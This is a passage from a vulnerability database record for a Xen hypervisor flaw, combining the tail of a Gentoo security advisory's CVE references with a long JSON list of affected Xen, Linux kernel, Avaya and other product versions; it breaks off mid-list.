CVE-2013-1918 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1918 [ 46 ] CVE-2013-1919 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1919 [ 47 ] CVE-2013-1920 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1920 [ 48 ] CVE-2013-1922 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1922 [ 49 ] CVE-2013-1952 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1952 [ 50 ] CVE-2013-1964 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1964 [ 51 ] CVE-2013-2076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2076 [ 52 ] CVE-2013-2077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2077 [ 53 ] CVE-2013-2078 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2078 [ 54 ] CVE-2013-2194 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2194 [ 55 ] CVE-2013-2195 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2195 [ 56 ] CVE-2013-2196 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2196 [ 57 ] CVE-2013-2211 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2211 [ 58 ] Xen TMEM http://lists.xen.org/archives/html/xen-announce/2012-09/msg00006.h= tml

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-201309-24.xml

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License

Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201310-0084",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "xen",
        "version": "3.1.3"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "xen",
        "version": "3.0.3"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "xen",
        "version": "3.0.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "xen",
        "version": "3.2.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "xen",
        "version": "3.1.4"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "xen",
        "version": "3.0.4"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "xen",
        "version": "3.2.3"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "xen",
        "version": "3.2.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "xen",
        "version": "3.2.0"
      },
      {
        "model": "xen",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "xen",
        "version": "3.3.0"
      },
      {
        "model": "xen",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "xen",
        "version": "3.3"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "xen",
        "version": "3.3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.43"
      },
      {
        "model": "kernel -test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.6"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.15"
      },
      {
        "model": "kernel 2.6.36-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.3"
      },
      {
        "model": "kernel 2.6.18-8.1.8.el5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.16"
      },
      {
        "model": "kernel 2.6.21-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "kernel -test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.1"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel 2.6.31-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.2"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "kernel 2.6.39-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel git2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.3"
      },
      {
        "model": "kernel git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.14"
      },
      {
        "model": "kernel 2.6.36-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "aura system platform sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36.2"
      },
      {
        "model": "kernel 2.6.35-rc5-git5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6-git6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel 2.6.38-git18",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel git4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.5"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.6"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "aura application server sip core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "kernel -test9-cvs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.32-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xensource",
        "version": "3.3.1"
      },
      {
        "model": "kernel 2.6.22-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.33-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc9",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "kernel 2.6.36-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xensource",
        "version": "3.0.3"
      },
      {
        "model": "linux enterprise sdk sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xensource",
        "version": "4.0"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel 2.6.24-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.35-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.09"
      },
      {
        "model": "kernel -test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 2.6.29-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel final",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel 2.6.37-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.33-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel -git7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel 2.6.31-git11",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "conferencing standard edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel 2.6.29-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.45"
      },
      {
        "model": "kernel 2.6.31-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38"
      },
      {
        "model": "kernel 2.6.31-rc5-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "voice portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.39"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.50"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel 2.6.35-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "voice portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xensource",
        "version": "3.0"
      },
      {
        "model": "kernel -git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xensource",
        "version": "3.1.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel 2.6.32-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.1"
      },
      {
        "model": "kernel -git14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.36"
      },
      {
        "model": "kernel -rc6",
